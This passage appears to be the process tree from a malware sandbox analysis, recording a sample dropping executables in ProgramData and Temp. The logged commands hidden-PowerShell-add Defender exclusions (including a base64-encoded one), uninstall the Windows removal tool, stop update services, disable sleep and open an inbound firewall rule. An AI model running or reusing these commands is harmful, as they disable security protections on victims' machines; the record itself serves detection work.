    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:440
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    PID:4476
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2944
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:2596
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:6704
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:5328
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      PID:4556
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:3164
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:648
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:396
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:5672
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:1940
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:6472
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:6456
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:7012
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:4532
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:6804
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    PID:5008
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4328
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:6600
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:5684
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:4604
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      PID:6972
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:5696
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7568
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    PID:1628
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6044
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:7268
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:4416
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      PID:8128
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:2328
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:2764
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      PID:2404
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:6544
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:8060
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:8160
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:6580
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:2140
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:7860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:8108
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    PID:812
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:8072
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:4416
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:6560
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      PID:932
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:7548
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:7436
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:864
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:7672
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:6512
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:4376
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:6588
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:7020
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:6960
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:5312
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    PID:7832
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4488
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:7564
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:4392
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:2664
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      Launches sc.exe
      PID:4604
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      PID:5860
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      Launches sc.exe
      PID:7464
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:7148
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:7980
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:6292
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:4416
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:4548
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:1292
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:7652
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    PID:6520
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4892
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:8024
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:7832
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop UsoSvc
      4⤵
      Launches sc.exe
      PID:7476
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop WaaSMedicSvc
      4⤵
      PID:7808
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop wuauserv
      4⤵
      Launches sc.exe
      PID:7288
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop bits
      4⤵
      PID:1668
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop dosvc
      4⤵
      Launches sc.exe
      PID:3308
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:4560
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:6868
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:8080
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:5748
  - - C:\Windows\explorer.exe
      explorer.exe
      4⤵
      PID:7512
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:6740
- - C:\ProgramData\wikombernizc\reakuqnanrkn.exe
    "C:\ProgramData\wikombernizc\reakuqnanrkn.exe"
    3⤵
    PID:8004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2216
- C:\Windows\explorer.exe
  explorer.exe
  2⤵
  PID:2812

C:\Windows\system32\winsvc.exe
C:\Windows\system32\winsvc.exe
1⤵
PID:6188
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\system32\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4324
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\Temp\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:872
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-SETACTIVE" "8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6820
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -SETACTIVE 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
    3⤵
    - Power Settings
    PID:4608
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-ac" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1124
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -change standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:7160
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-dc" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2128
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -change standby-timeout-dc 0
    3⤵
    - Power Settings
    PID:2476
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-ac" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:4388
- - C:\Windows\system32\wermgr.exe
    "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4388" "1824" "1744" "1828" "0" "0" "1832" "0" "0" "0" "0" "0"
    3⤵
    PID:2944
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-dc" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5992
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -change hibernate-timeout-dc 0
    3⤵
    - Power Settings
    PID:1300
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "winnet.exe"
  2⤵
  - Kills process with taskkill
  PID:1164
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "winnet.exe"
  2⤵
  - Kills process with taskkill
  PID:1424
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:5620
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "wincfg.exe"
  2⤵
  - Kills process with taskkill
  PID:2116
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "wincfg.exe"
  2⤵
  - Kills process with taskkill
  PID:6780
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Remove-NetFirewallRule" "-DisplayName" "\"Windows Network Manager\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:5552
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "New-NetFirewallRule" "-DisplayName" "\"Windows Network Manager\"" "-Program" "\"C:\Windows\system32\winnet.exe\"" "-Action" "Allow" "-Direction" "Inbound" "-EdgeTraversalPolicy" "Allow" "-Enabled" "True"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:988

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 6216 -ip 6216
1⤵
PID:5192

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
PID:6040

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
PID:4704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 6300 -ip 6300
1⤵
PID:5648

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 6300 -ip 6300
1⤵
PID:6928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1676

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:4816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4596 -ip 4596
1⤵
PID:6928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4580 -ip 4580
1⤵
PID:3976

C:\Windows\system32\winsvc.exe
C:\Windows\system32\winsvc.exe
1⤵
PID:2052
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\system32\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:1612
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "Add-MpPreference" "-ExclusionPath" "\"C:\Windows\Temp\""
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:8000
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-SETACTIVE" "8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:7736
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -SETACTIVE 8c5e7fda-e8bf-4a96-9a85-a6e23a8c635c
    3⤵
    - Power Settings
    PID:2208
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-ac" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:6544
- - C:\Windows\system32\powercfg.exe
    "C:\Windows\system32\powercfg.exe" -change standby-timeout-ac 0
    3⤵
    - Power Settings
    PID:7380
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "standby-timeout-dc" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:8096
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-ac" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2128
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "powershell.exe" "-WindowStyle" "Hidden" "-Command" "&" "powercfg.exe" "-change" "hibernate-timeout-dc" "0"
  2⤵
  - Command and Scripting Interpreter: PowerShell
  PID:2140
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "winnet.exe"
  2⤵
  - Kills process with taskkill
  PID:2656
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "winnet.exe"
  2⤵
  - Kills process with taskkill
  PID:6924
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "wincfg.exe"
  2⤵
  - Kills process with taskkill
  PID:5692
- C:\Windows\system32\taskkill.exe
  "taskkill.exe" "/F" "/IM" "wincfg.exe"
  2⤵
  - Kills process with taskkill
  PID:6420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwALABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAARgBhAGwAbABiAGEAYwBrAEIAdQBmAGYAZQByAC4AZQB4AGUAOwA=
1⤵
- Command and Scripting Interpreter: PowerShell
PID:7248

C:\Users\Admin\AppData\Local\Temp\PYdNtka8eSZoE\Y-Cleaner.exe
"C:\Users\Admin\AppData\Local\Temp\PYdNtka8eSZoE\Y-Cleaner.exe"
1⤵
PID:3836
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://g-cleanit.hk/
  2⤵
  PID:1840
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffa952446f8,0x7ffa95244708,0x7ffa95244718
    3⤵
    PID:180
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2100 /prefetch:2
    3⤵
    PID:8060
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 /prefetch:3
    3⤵
    PID:7660
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
    3⤵
    PID:8084
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3308 /prefetch:1
    3⤵
    PID:5948
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3316 /prefetch:1
    3⤵
    PID:5788
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4020 /prefetch:1
    3⤵
    PID:5184
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4684 /prefetch:1
    3⤵
    PID:4596
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1
    3⤵
    PID:8068
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5060 /prefetch:1
    3⤵
    PID:3352
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4848 /prefetch:1
    3⤵
    PID:7440
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2040,6744222427129697573,13103294534839719299,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:1
    3⤵
    PID:7088
